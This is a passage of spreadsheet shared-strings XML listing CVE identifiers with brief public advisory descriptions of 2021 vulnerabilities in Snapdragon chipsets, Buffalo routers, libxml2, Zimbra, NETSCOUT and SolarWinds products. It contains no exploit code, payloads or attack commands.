    <t>Possible buffer overflow due to lack of buffer length check during management frame Rx handling in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Industrial IOT, Snapdragon Mobile</t>
  </si>
  <si>
    <t>CVE-2021-35086</t>
  </si>
  <si>
    <t>Possible buffer over read due to improper validation of SIB type when processing a NR system Information message in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Industrial IOT, Snapdragon Mobile</t>
  </si>
  <si>
    <t>CVE-2021-35087</t>
  </si>
  <si>
    <t>Possible null pointer access due to improper validation of system information message to be processed in Snapdragon Industrial IOT, Snapdragon Mobile</t>
  </si>
  <si>
    <t>CVE-2021-35088</t>
  </si>
  <si>
    <t>Possible out of bound read due to improper validation of IE length during SSID IE parse when channel is DFS in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Wearables, Snapdragon Wired Infrastructure and Networking</t>
  </si>
  <si>
    <t>CVE-2021-35089</t>
  </si>
  <si>
    <t>Possible buffer overflow due to lack of input IB amount validation while processing the user command in Snapdragon Auto</t>
  </si>
  <si>
    <t>CVE-2021-3509</t>
  </si>
  <si>
    <t>A flaw was found in Red Hat Ceph Storage 4, in the Dashboard component. In response to CVE-2020-27839, the JWT token was moved from localStorage to an httpOnly cookie. However, token cookies are used in the body of the HTTP response for the documentation, which again makes it available to XSS.The greatest threat to the system is for confidentiality, integrity, and availability.</t>
  </si>
  <si>
    <t>CVE-2021-35090</t>
  </si>
  <si>
    <t>Possible hypervisor memory corruption due to TOC TOU race condition when updating address mappings in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Industrial IOT, Snapdragon Mobile</t>
  </si>
  <si>
    <t>CVE-2021-35091</t>
  </si>
  <si>
    <t>Possible out of bounds read due to improper typecasting while handling page fault for global memory in Snapdragon Connectivity, Snapdragon Mobile</t>
  </si>
  <si>
    <t>CVE-2021-35092</t>
  </si>
  <si>
    <t>Processing DCB/AVB algorithm with an invalid queue index from IOCTL request could lead to arbitrary address modification in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice &amp; Music</t>
  </si>
  <si>
    <t>CVE-2021-35093</t>
  </si>
  <si>
    <t>Possible memory corruption in BT controller when it receives an oversized LMP packet over 2-DH1 link and leads to denial of service in BlueCore</t>
  </si>
  <si>
    <t>CVE-2021-35094</t>
  </si>
  <si>
    <t>Improper verification of timeout-based authentication in identity credential can lead to invalid authorization in HLOS in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Industrial IOT, Snapdragon Mobile</t>
  </si>
  <si>
    <t>CVE-2021-35095</t>
  </si>
  <si>
    <t>Improper serialization of message queue client registration can lead to race condition allowing multiple gunyah message clients to register with same label in Snapdragon Connectivity, Snapdragon Mobile</t>
  </si>
  <si>
    <t>CVE-2021-35096</t>
  </si>
  <si>
    <t>Improper memory allocation during counter check DLM handling can lead to denial of service in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Industrial IOT, Snapdragon Mobile</t>
  </si>
  <si>
    <t>CVE-2021-35097</t>
  </si>
  <si>
    <t>Possible authentication bypass due to improper order of signature verification and hashing in the signature verification call in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wearables</t>
  </si>
  <si>
    <t>CVE-2021-35098</t>
  </si>
  <si>
    <t>Improper validation of session id in PCM routing process can lead to memory corruption in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wearables</t>
  </si>
  <si>
    <t>CVE-2021-3510</t>
  </si>
  <si>
    <t>Zephyr JSON decoder incorrectly decodes array of array. Zephyr versions &gt;= &gt;1.14.0, &gt;= &gt;2.5.0 contain Attempt to Access Child of a Non-structure Pointer (CWE-588). For more information, see https://github.com/zephyrproject-rtos/zephyr/security/advisories/GHSA-289f-7mw3-2qf4</t>
  </si>
  <si>
    <t>CVE-2021-35100</t>
  </si>
  <si>
    <t>Possible buffer over read due to improper calculation of string length while parsing Id3 tag in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wearables</t>
  </si>
  <si>
    <t>CVE-2021-35101</t>
  </si>
  <si>
    <t>Improper handling of writes to virtual GICR control can lead to assertion failure in the hypervisor in Snapdragon Auto, Snapdragon Compute, Snapdragon Mobile</t>
  </si>
  <si>
    <t>CVE-2021-35102</t>
  </si>
  <si>
    <t>Possible buffer overflow due to lack of validation for the length of NAI string read from EFS in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Mobile</t>
  </si>
  <si>
    <t>CVE-2021-35103</t>
  </si>
  <si>
    <t>Possible out of bound write due to improper validation of number of timer values received from firmware while syncing timers in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Wearables, Snapdragon Wired Infrastructure and Networking</t>
  </si>
  <si>
    <t>CVE-2021-35104</t>
  </si>
  <si>
    <t>Possible buffer overflow due to improper parsing of headers while playing the FLAC audio clip in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Voice &amp; Music, Snapdragon Wearables, Snapdragon Wired Infrastructure and Networking</t>
  </si>
  <si>
    <t>CVE-2021-35105</t>
  </si>
  <si>
    <t>Possible out of bounds access due to improper input validation during graphics profiling in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wearables</t>
  </si>
  <si>
    <t>CVE-2021-35106</t>
  </si>
  <si>
    <t>Possible out of bound read due to improper length calculation of WMI message. in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wearables</t>
  </si>
  <si>
    <t>CVE-2021-35108</t>
  </si>
  <si>
    <t>Improper checking of AP-S lock bit while verifying the secure resource group permissions can lead to non secure read and write access in Snapdragon Connectivity, Snapdragon Mobile</t>
  </si>
  <si>
    <t>CVE-2021-35109</t>
  </si>
  <si>
    <t>Possible address manipulation from APP-NS while APP-S is configuring an RG where it tries to merge the address ranges in Snapdragon Connectivity, Snapdragon Mobile</t>
  </si>
  <si>
    <t>CVE-2021-3511</t>
  </si>
  <si>
    <t>Disclosure of sensitive information to an unauthorized user vulnerability in Buffalo broadband routers (BHR-4GRV firmware Ver.1.99 and prior, DWR-HP-G300NH firmware Ver.1.83 and prior, HW-450HP-ZWE firmware Ver.1.99 and prior, WHR-300HP firmware Ver.1.99 and prior, WHR-300 firmware Ver.1.99 and prior, WHR-G301N firmware Ver.1.86 and prior, WHR-HP-G300N firmware Ver.1.99 and prior, WHR-HP-GN firmware Ver.1.86 and prior, WPL-05G300 firmware Ver.1.87 and prior, WZR-450HP-CWT firmware Ver.1.99 and prior, WZR-450HP-UB firmware Ver.1.99 and prior, WZR-HP-AG300H firmware Ver.1.75 and prior, WZR-HP-G300NH firmware Ver.1.83 and prior, WZR-HP-G301NH firmware Ver.1.83 and prior, WZR-HP-G302H firmware Ver.1.85 and prior, WZR-HP-G450H firmware Ver.1.89 and prior, WZR-300HP firmware Ver.1.99 and prior, WZR-450HP firmware Ver.1.99 and prior, WZR-600DHP firmware Ver.1.99 and prior, WZR-D1100H firmware Ver.1.99 and prior, FS-HP-G300N firmware Ver.3.32 and prior, FS-600DHP firmware Ver.3.38 and prior, FS-R600DHP firmware Ver.3.39 and prior, and FS-G300N firmware Ver.3.13 and prior) allows remote unauthenticated attackers to obtain information such as configuration via unspecified vectors.</t>
  </si>
  <si>
    <t>CVE-2021-35110</t>
  </si>
  <si>
    <t>Possible buffer overflow to improper validation of hash segment of file while allocating memory in Snapdragon Connectivity, Snapdragon Mobile</t>
  </si>
  <si>
    <t>CVE-2021-35111</t>
  </si>
  <si>
    <t>Improper validation of tag id while RRC sending tag id to MAC can lead to TOCTOU race condition in Snapdragon Connectivity, Snapdragon Mobile</t>
  </si>
  <si>
    <t>CVE-2021-35112</t>
  </si>
  <si>
    <t>A user with user level permission can access graphics protected region due to improper access control in register configuration in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wearables</t>
  </si>
  <si>
    <t>CVE-2021-35113</t>
  </si>
  <si>
    <t>Possible authentication bypass due to improper order of signature verification and hashing in the signature verification call in Snapdragon Auto, Snapdragon Compute, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Wearables</t>
  </si>
  <si>
    <t>CVE-2021-35114</t>
  </si>
  <si>
    <t>Improper buffer initialization on the backend driver can lead to buffer overflow in Snapdragon Auto</t>
  </si>
  <si>
    <t>CVE-2021-35115</t>
  </si>
  <si>
    <t>Improper handling of multiple session supported by PVM backend can lead to use after free in Snapdragon Auto, Snapdragon Mobile</t>
  </si>
  <si>
    <t>CVE-2021-35116</t>
  </si>
  <si>
    <t>APK can load a crafted model into the CDSP which can lead to a compromise of CDSP and other APK`s data executing there in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Wearables</t>
  </si>
  <si>
    <t>CVE-2021-35117</t>
  </si>
  <si>
    <t>An Out of Bounds read may potentially occur while processing an IBSS beacon, in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice &amp; Music</t>
  </si>
  <si>
    <t>CVE-2021-35118</t>
  </si>
  <si>
    <t>An out-of-bounds write can occur due to an incorrect input check in the camera driver in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wearables</t>
  </si>
  <si>
    <t>CVE-2021-35119</t>
  </si>
  <si>
    <t>Potential out of Bounds read in FIPS event processing due to improper validation of the length from the firmware in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Industrial IOT, Snapdragon Mobile</t>
  </si>
  <si>
    <t>CVE-2021-3512</t>
  </si>
  <si>
    <t>Improper access control vulnerability in Buffalo broadband routers (BHR-4GRV firmware Ver.1.99 and prior, DWR-HP-G300NH firmware Ver.1.83 and prior, HW-450HP-ZWE firmware Ver.1.99 and prior, WHR-300HP firmware Ver.1.99 and prior, WHR-300 firmware Ver.1.99 and prior, WHR-G301N firmware Ver.1.86 and prior, WHR-HP-G300N firmware Ver.1.99 and prior, WHR-HP-GN firmware Ver.1.86 and prior, WPL-05G300 firmware Ver.1.87 and prior, WZR-450HP-CWT firmware Ver.1.99 and prior, WZR-450HP-UB firmware Ver.1.99 and prior, WZR-HP-AG300H firmware Ver.1.75 and prior, WZR-HP-G300NH firmware Ver.1.83 and prior, WZR-HP-G301NH firmware Ver.1.83 and prior, WZR-HP-G302H firmware Ver.1.85 and prior, WZR-HP-G450H firmware Ver.1.89 and prior, WZR-300HP firmware Ver.1.99 and prior, WZR-450HP firmware Ver.1.99 and prior, WZR-600DHP firmware Ver.1.99 and prior, WZR-D1100H firmware Ver.1.99 and prior, FS-HP-G300N firmware Ver.3.32 and prior, FS-600DHP firmware Ver.3.38 and prior, FS-R600DHP firmware Ver.3.39 and prior, and FS-G300N firmware Ver.3.13 and prior) allows remote unauthenticated attackers to bypass access restriction and to start telnet service and execute arbitrary OS commands with root privileges via unspecified vectors.</t>
  </si>
  <si>
    <t>CVE-2021-35120</t>
  </si>
  <si>
    <t>Improper handling between export and release functions on the same handle from client can lead to use after free in Snapdragon Compute, Snapdragon Connectivity, Snapdragon Industrial IOT, Snapdragon Mobile</t>
  </si>
  <si>
    <t>CVE-2021-35121</t>
  </si>
  <si>
    <t>An array index is improperly used to lock and unlock a mutex which can lead to a Use After Free condition In the Synx driver in Snapdragon Compute, Snapdragon Connectivity, Snapdragon Industrial IOT, Snapdragon Mobile</t>
  </si>
  <si>
    <t>CVE-2021-35122</t>
  </si>
  <si>
    <t>Non-secure region can try modifying RG permissions of IO space xPUs due to improper input validation in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Wearables</t>
  </si>
  <si>
    <t>CVE-2021-35123</t>
  </si>
  <si>
    <t>Buffer copy in GATT multi notification due to improper length check for the data coming over-the-air in Snapdragon Connectivity, Snapdragon Industrial IOT</t>
  </si>
  <si>
    <t>CVE-2021-35126</t>
  </si>
  <si>
    <t>Memory corruption in DSP service due to improper validation of input parameters in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Industrial IOT, Snapdragon Mobile</t>
  </si>
  <si>
    <t>CVE-2021-35129</t>
  </si>
  <si>
    <t>Memory corruption in BT controller due to improper length check while processing vendor specific commands in Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer Electronics Connectivity, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Wired Infrastructure and Networking</t>
  </si>
  <si>
    <t>CVE-2021-3513</t>
  </si>
  <si>
    <t>A flaw was found in keycloak where a brute force attack is possible even when the permanent lockout feature is enabled. This is due to a wrong error message displayed when wrong credentials are entered. The highest threat from this vulnerability is to confidentiality.</t>
  </si>
  <si>
    <t>CVE-2021-35130</t>
  </si>
  <si>
    <t>Memory corruption in graphics support layer due to use after free condition in Snapdragon Auto, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Wearables</t>
  </si>
  <si>
    <t>CVE-2021-35132</t>
  </si>
  <si>
    <t>Out of bound write in DSP service due to improper bound check for response buffer size in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Wearables</t>
  </si>
  <si>
    <t>CVE-2021-35133</t>
  </si>
  <si>
    <t>Use after free in the synx driver issue while performing other functions during multiple invocation of synx release calls in Snapdragon Connectivity, Snapdragon Industrial IOT, Snapdragon Mobile</t>
  </si>
  <si>
    <t>CVE-2021-35134</t>
  </si>
  <si>
    <t>Due to insufficient validation of ELF headers, an Incorrect Calculation of Buffer Size can occur in Boot leading to memory corruption in Snapdragon Connectivity, Snapdragon Industrial IOT, Snapdragon Mobile</t>
  </si>
  <si>
    <t>CVE-2021-35135</t>
  </si>
  <si>
    <t>A null pointer dereference may potentially occur during RSA key import in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wearables</t>
  </si>
  <si>
    <t>CVE-2021-3514</t>
  </si>
  <si>
    <t>When using a sync_repl client in 389-ds-base, an authenticated attacker can cause a NULL pointer dereference using a specially crafted query, causing a crash.</t>
  </si>
  <si>
    <t>CVE-2021-3515</t>
  </si>
  <si>
    <t>A shell injection flaw was found in pglogical in versions before 2.3.4 and before 3.6.26. An attacker with CREATEDB privileges on a PostgreSQL server can craft a database name that allows execution of shell commands as the postgresql user when calling pglogical.create_subscription().</t>
  </si>
  <si>
    <t>CVE-2021-3516</t>
  </si>
  <si>
    <t>There's a flaw in libxml2's xmllint in versions before 2.9.11. An attacker who is able to submit a crafted file to be processed by xmllint could trigger a use-after-free. The greatest impact of this flaw is to confidentiality, integrity, and availability.</t>
  </si>
  <si>
    <t>CVE-2021-3517</t>
  </si>
  <si>
    <t>There is a flaw in the xml entity encoding functionality of libxml2 in versions before 2.9.11. An attacker who is able to supply a crafted file to be processed by an application linked with the affected functionality of libxml2 could trigger an out-of-bounds read. The most likely impact of this flaw is to application availability, with some potential impact to confidentiality and integrity if an attacker is able to use memory information to further exploit the application.</t>
  </si>
  <si>
    <t>CVE-2021-3518</t>
  </si>
  <si>
    <t>There's a flaw in libxml2 in versions before 2.9.11. An attacker who is able to submit a crafted file to be processed by an application linked with libxml2 could trigger a use-after-free. The greatest impact from this flaw is to confidentiality, integrity, and availability.</t>
  </si>
  <si>
    <t>CVE-2021-3519</t>
  </si>
  <si>
    <t>A vulnerability was reported in some Lenovo Desktop models that could allow unauthorized access to the boot menu, when the "BIOS Password At Boot Device List" BIOS setting is Yes.</t>
  </si>
  <si>
    <t>CVE-2021-35193</t>
  </si>
  <si>
    <t>Patterson Application Service in Patterson Eaglesoft 18 through 21 accepts the same certificate authentication across different customers' installations (that have the same software version). This provides remote access to SQL database credentials. (In the normal use of the product, retrieving those credentials only occurs after a username/password authentication step; however, this authentication step is on the client side, and an attacker can develop their own client that skips this step.)</t>
  </si>
  <si>
    <t>CVE-2021-35196</t>
  </si>
  <si>
    <t>** DISPUTED ** Manuskript through 0.12.0 allows remote attackers to execute arbitrary code via a crafted settings.pickle file in a project file, because there is insecure deserialization via the pickle.load() function in settings.py. NOTE: the vendor's position is that the product is not intended for opening an untrusted project file.</t>
  </si>
  <si>
    <t>CVE-2021-35197</t>
  </si>
  <si>
    <t>In MediaWiki before 1.31.15, 1.32.x through 1.35.x before 1.35.3, and 1.36.x before 1.36.1, bots have certain unintended API access. When a bot account has a "sitewide block" applied, it is able to still "purge" pages through the MediaWiki Action API (which a "sitewide block" should have prevented).</t>
  </si>
  <si>
    <t>CVE-2021-35198</t>
  </si>
  <si>
    <t>NETSCOUT nGeniusONE 6.3.0 build 1004 and earlier allows Stored Cross-Site Scripting (XSS) in the Packet Analysis module.</t>
  </si>
  <si>
    <t>CVE-2021-35199</t>
  </si>
  <si>
    <t>NETSCOUT nGeniusONE 6.3.0 build 1196 and earlier allows Stored Cross-Site Scripting (XSS) in UploadFile.</t>
  </si>
  <si>
    <t>CVE-2021-3520</t>
  </si>
  <si>
    <t>There's a flaw in lz4. An attacker who submits a crafted file to an application linked with lz4 may be able to trigger an integer overflow, leading to calling of memmove() on a negative size argument, causing an out-of-bounds write and/or a crash. The greatest impact of this flaw is to availability, with some potential impact to confidentiality and integrity as well.</t>
  </si>
  <si>
    <t>CVE-2021-35200</t>
  </si>
  <si>
    <t>NETSCOUT nGeniusONE 6.3.0 build 1196 allows high-privileged users to achieve Stored Cross-Site Scripting (XSS) in FDSQueryService.</t>
  </si>
  <si>
    <t>CVE-2021-35201</t>
  </si>
  <si>
    <t>NEI in NETSCOUT nGeniusONE 6.3.0 build 1196 allows XML External Entity (XXE) attacks.</t>
  </si>
  <si>
    <t>CVE-2021-35202</t>
  </si>
  <si>
    <t>NETSCOUT Systems nGeniusONE 6.3.0 build 1196 allows Authorization Bypass (to access an endpoint) in FDSQueryService.</t>
  </si>
  <si>
    <t>CVE-2021-35203</t>
  </si>
  <si>
    <t>NETSCOUT Systems nGeniusONE 6.3.0 build 1196 allows Arbitrary File Read operations via the FDSQueryService endpoint.</t>
  </si>
  <si>
    <t>CVE-2021-35204</t>
  </si>
  <si>
    <t>NETSCOUT Systems nGeniusONE 6.3.0 build 1196 allows Reflected Cross-Site Scripting (XSS) in the support endpoint.</t>
  </si>
  <si>
    <t>CVE-2021-35205</t>
  </si>
  <si>
    <t>NETSCOUT Systems nGeniusONE version 6.3.0 build 1196 allows URL redirection in redirector.</t>
  </si>
  <si>
    <t>CVE-2021-35206</t>
  </si>
  <si>
    <t>Gitpod before 0.6.0 allows unvalidated redirects.</t>
  </si>
  <si>
    <t>CVE-2021-35207</t>
  </si>
  <si>
    <t>An issue was discovered in Zimbra Collaboration Suite 8.8 before 8.8.15 Patch 23 and 9.0 before 9.0.0 Patch 16. An XSS vulnerability exists in the login component of Zimbra Web Client, in which an attacker can execute arbitrary JavaScript by adding executable JavaScript to the loginErrorCode parameter of the login url.</t>
  </si>
  <si>
    <t>CVE-2021-35208</t>
  </si>
  <si>
    <t>An issue was discovered in ZmMailMsgView.js in the Calendar Invite component in Zimbra Collaboration Suite 8.8.x before 8.8.15 Patch 23. An attacker could place HTML containing executable JavaScript inside element attributes. This markup becomes unescaped, causing arbitrary markup to be injected into the document.</t>
  </si>
  <si>
    <t>CVE-2021-35209</t>
  </si>
  <si>
    <t>An issue was discovered in ProxyServlet.java in the /proxy servlet in Zimbra Collaboration Suite 8.8 before 8.8.15 Patch 23 and 9.x before 9.0.0 Patch 16. The value of the X-Host header overwrites the value of the Host header in proxied requests. The value of X-Host header is not checked against the whitelist of hosts Zimbra is allowed to proxy to (the zimbraProxyAllowedDomains setting).</t>
  </si>
  <si>
    <t>CVE-2021-3521</t>
  </si>
  <si>
    <t>There is a flaw in RPM's signature functionality. OpenPGP subkeys are associated with a primary key via a "binding signature." RPM does not check the binding signature of subkeys prior to importing them. If an attacker is able to add or socially engineer another party to add a malicious subkey to a legitimate public key, RPM could wrongly trust a malicious signature. The greatest impact of this flaw is to data integrity. To exploit this flaw, an attacker must either compromise an RPM repository or convince an administrator to install an untrusted RPM or public key. It is strongly recommended to only use RPMs and public keys from trusted sources.</t>
  </si>
  <si>
    <t>CVE-2021-35210</t>
  </si>
  <si>
    <t>Contao 4.5.x through 4.9.x before 4.9.16, and 4.10.x through 4.11.x before 4.11.5, allows XSS. It is possible to inject code into the tl_log table that will be executed in the browser when the system log is called in the back end.</t>
  </si>
  <si>
    <t>CVE-2021-35211</t>
  </si>
  <si>
    <t>Microsoft discovered a remote code execution (RCE) vulnerability in the SolarWinds Serv-U product utilizing a Remote Memory Escape Vulnerability. If exploited, a threat actor may be able to gain privileged access to the machine hosting Serv-U Only. SolarWinds Serv-U Managed File Transfer and Serv-U Secure FTP for Windows before 15.2.3 HF2 are affected by this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2021-35212</t>
  </si>
  <si>
    <t>An SQL injection Privilege Escalation Vulnerability was discovered in the Orion Platform reported by the ZDI Team. A blind Boolean SQL injection which could lead to full read/write over the Orion database content including the Orion certificate for any authenticated user.</t>
  </si>
  <si>
    <t>CVE-2021-35213</t>
  </si>
  <si>
    <t>An Improper Access Control Privilege Escalation Vulnerability was discovered in the User Setting of Orion Platform version 2020.2.5. It allows a guest user to elevate privileges to the Administrator using this vulnerability. Authentication is required to exploit the vulnerability.</t>
  </si>
  <si>
    <t>CVE-2021-35214</t>
  </si>
  <si>
    <t>The vulnerability in SolarWinds Pingdom can be described as a failure to invalidate user session upon password or email address change. When running multiple active sessions in separate browser windows, it was observed a password or email address change could be changed without terminating the user session. This issue has been resolved on September 13, 2021.</t>
  </si>
  <si>
    <t>CVE-2021-35215</t>
  </si>
  <si>
    <t>Insecure deserialization leading to Remote Code Execution was detected in the Orion Platform version 2020.2.5. Authentication is required to exploit this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2021-35216</t>
  </si>
  <si>
    <t>Insecure Deserialization of untrusted data remote code execution vulnerability was discovered in Patch Manager Orion Platform Integration module. An Authenticated Attacker with network access via HTTP can compromise this vulnerability can result in Remote Code Execution.</t>
  </si>
  <si>
    <t>CVE-2021-35217</t>
  </si>
  <si>
    <t>Insecure Deseralization of untrusted data remote code execution vulnerability was discovered in Patch Manager Orion Platform Integration module and reported to us by ZDI. An Authenticated Attacker could exploit it by executing WSAsyncExecuteTasks deserialization of untrusted data.</t>
  </si>
  <si>
    <t>CVE-2021-35218</t>
  </si>
  <si>
    <t>Deserialization of Untrusted Data in the Web Console Chart Endpoint can lead to remote code execution. An unauthorized attacker who has network access to the Orion Patch Manager Web Console could potentially exploit this and compromise the server</t>
  </si>
  <si>
    <t>CVE-2021-35219</t>
  </si>
  <si>
    <t>ExportToPdfCmd Arbitrary File Read Information Disclosure Vulnerability using ImportAlert function within the Alerts Settings page.</t>
  </si>
  <si>
    <t>CVE-2021-3522</t>
  </si>
  <si>
    <t>GStreamer before 1.18.4 may perform an out-of-bounds read when handling certain ID3v2 tags.</t>
  </si>
  <si>
    <t>CVE-2021-35220</t>
  </si>
  <si>
    <t>Command Injection vulnerability in EmailWebPage API which can lead to a Remote Code Execution (RCE) from the Alerts Settings page.</t>
  </si>
  <si>
    <t>CVE-2021-35221</t>
  </si>
  <si>
    <t>Improper Access Control Tampering Vulnerability using ImportAlert function which can lead to a Remote Code Execution (RCE) from the Alerts Settings page.</t>
  </si>
  <si>
    <t>CVE-2021-35222</t>
  </si>
  <si>
    <t>This vulnerability allows attackers to impersonate users and perform arbitrary actions leading to a Remote Code Execution (RCE) from the Alerts Settings page.</t>
  </si>
  <si>
    <t>CVE-2021-35223</t>
  </si>
  <si>
    <t>The Serv-U File Server allows for events such as user login failures to be audited by executing a command. This command can be supplied with parameters that can take the form of user string variables, allowing remote code execution.</t>
  </si>
  <si>
    <t>CVE-2021-35225</t>
  </si>
  <si>
    <t>Each authenticated Orion Platform user in a MSP (Managed Service Provider) environment can view and browse all NetPath Services from all that MSP's customers. This can lead to any user having a limited insight into other customer's infrastructure and potential data cross-contamination.</t>
  </si>
  <si>
    <t>CVE-2021-35226</t>
  </si>
  <si>
    <t>An entity in Network Configuration Manager product is misconfigured and exposing password field to Solarwinds Information Service (SWIS). Exposed credentials are encrypted and require authenticated access with an NCM role.</t>
  </si>
  <si>
    <t>CVE-2021-35227</t>
  </si>
  <si>
    <t>The HTTP interface was enabled for RabbitMQ Plugin in ARM 2020.2.6 and the ability to configure HTTPS was not available.</t>
  </si>
  <si>
    <t>CVE-2021-35228</t>
  </si>
  <si>
    <t>This vulnerability occurred due to missing input sanitization for one of the output fields that is extracted from headers on specific section of page causing a reflective cross site scripting attack. An attacker would need to perform a Man in the Middle attack in order to change header for a remote victim.</t>
  </si>
  <si>
    <t>CVE-2021-35229</t>
  </si>
  <si>
    <t>Cross-site scripting vulnerability is present in Database Performance Monitor 2022.1.7779 and previous versions when using a complex SQL query</t>
  </si>
  <si>
    <t>CVE-2021-3523</t>
  </si>
  <si>
    <t>A flaw was found in 3Scale APICast in versions prior to 2.11.0, where it incorrectly identified connections for reuse. This flaw allows an attacker to bypass security restrictions for an API request when hosting multiple APIs on the same IP address.</t>
  </si>
  <si>
    <t>CVE-2021-35230</t>
  </si>
  <si>
    <t>As a result of an unquoted service path vulnerability present in the Kiwi CatTools Installation Wizard, a local attacker could gain escalated privileges by inserting an executable into the path of the affected service or uninstall entry.</t>
  </si>
  <si>
    <t>CVE-2021-35231</t>
  </si>
  <si>
    <t>As a result of an unquoted service path vulnerability present in the Kiwi Syslog Server Installation Wizard, a local attacker could gain escalated privileges by inserting an executable into the path of the affected service or uninstall entry. Example vulnerable path: "Computer\HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Kiwi Syslog Server\Parameters\Application".</t>
  </si>
  <si>
    <t>CVE-2021-35232</t>
  </si>
  <si>
    <t>Hard coded credentials discovered in SolarWinds Web Help Desk product. Through these credentials, the attacker with local access to the Web Help Desk host machine allows to execute arbitrary HQL queries against the database and leverage the vulnerability to steal the password hashes of the users or insert arbitrary data into the database.</t>
  </si>
  <si>
    <t>CVE-2021-35233</t>
  </si>
  <si>
    <t>The HTTP TRACK &amp; TRACE methods were enabled in Kiwi Syslog Server 9.7.1 and earlier. These methods are intended for diagnostic purposes only. If enabled, the web server will respond to requests that use these methods by returning exact HTTP request that was received in the response to the client. This may lead to the disclosure of sensitive information such as internal authentication headers appended by reverse proxies.</t>
  </si>
  <si>
    <t>CVE-2021-35234</t>
  </si>
  <si>
    <t>Numerous exposed dangerous functions within Orion Core has allows for read-only SQL injection leading to privileged escalation. An attacker with low-user privileges may steal password hashes and password salt information.</t>
  </si>
  <si>
    <t>CVE-2021-35235</t>
  </si>
  <si>
    <t>The ASP.NET debug feature is enabled by default in Kiwi Syslog Server 9.7.2 and previous versions. ASP.NET allows remote debugging of web applications, if configured to do so. Debug mode causes ASP.NET to compile applications with extra information. The information enables a debugger to closely monitor and control the execution of an application. If an attacker could successfully start a remote debugging session, this is likely to disclose sensitive information about the web application and supporting infrastructure that may be valuable in targeting SWI with malicious intent.</t>
  </si>
  <si>
    <t>CVE-2021-35236</t>
  </si>
  <si>
    <t>The Secure flag is not set in the SSL Cookie of Kiwi Syslog Server 9.7.2 and previous versions. The Secure attribute tells the browser to only send the cookie if the request is being sent over a secure channel such as HTTPS. This will help protect the cookie from being passed over unencrypted requests. If the application can be accessed over both HTTP, there is a potential for the cookie can be sent in clear text.</t>
  </si>
  <si>
    <t>CVE-2021-35237</t>
  </si>
  <si>
    <t>A missing HTTP header (X-Frame-Options) in Kiwi Syslog Server has left customers vulnerable to click jacking. Clickjacking is an attack that occurs when an attacker uses a transparent iframe in a window to trick a user into clicking on an actionable item, such as a button or link, to another server in which they have an identical webpage. The attacker essentially hijacks the user activity intended for the original server and sends them to the other server. This is an attack on both the user and the server.</t>
  </si>
  <si>
    <t>CVE-2021-35238</t>
  </si>
  <si>
    <t>User with Orion Platform Admin Rights could store XSS through URL POST parameter in CreateExternalWebsite website.</t>
  </si>
  <si>
    <t>CVE-2021-35239</t>
  </si>
  <si>
    <t>A security researcher found a user with Orion map manage rights could store XSS through via text box hyperlink.</t>
  </si>
  <si>
    <t>CVE-2021-3524</t>
  </si>
  <si>
